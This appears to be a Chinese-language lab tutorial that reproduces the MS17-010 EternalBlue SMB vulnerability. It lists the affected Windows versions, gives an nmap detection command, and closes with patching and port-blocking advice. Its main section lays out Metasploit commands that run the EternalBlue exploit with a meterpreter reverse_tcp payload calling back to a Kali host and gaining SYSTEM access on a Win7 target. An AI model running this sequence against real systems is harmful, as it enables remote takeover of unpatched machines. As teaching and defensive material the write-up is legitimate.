ms-17-010漏洞复现

漏洞简介

EternalBlue(在微软的MS17-010中被修复)是在Windows的SMB服务处理SMB v1请求时发生的漏洞，这个漏洞导致攻击者在目标系统上可以执行任意代码。

漏洞影响范围

Windows Server 2000 SP0 x86 Windows 2000 Professional SP4 x86 Windows 2000 Advanced Server SP4 x86 Windows XP SP0 x86 Windows XP SP1 x86 Windows XP SP2 x86 Windows XP SP3 x86 Windows XP SP2 x64 Windows Server 2003 x86 Windows Server 2003 Enterprise SP 2 x86 Windows Server 2003 x64 Windows Vista Home Premium x86 Windows Server 2008 x64 Windows 7 x86 Windows 7 x64 Windows Server 2008 R2 x64 Windows 8 x86 Windows 8 x64 Windows 8.1 x86 Windows 8.1 x64 Windows Server 2012 R2 Standard 9600 x64 Windows Server 2016 10.10586 x64 Windows Server 2016 Data Center 10.14393 x64

漏洞检测

使用nmap命令：nmap -p445 --script smb-vuln-ms17-010 目标IP

复现

攻击机 kali 192.168.23.140 靶机 win7 192.168.23.137

使用msf

msfconsole msf6 > use exploit/windows/smb/ms17_010_eternalblue msf6 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp msf6 exploit(windows/smb/ms17_010_eternalblue) > show options msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhost 192.168.23.137 msf6 exploit(windows/smb/ms17_010_eternalblue) > set lhost 192.168.23.140 msf6 exploit(windows/smb/ms17_010_eternalblue) > run 最后获得system权限

漏洞处理

1.下载安全补丁 2、添加入站规则，关闭445、135、137、138、139端口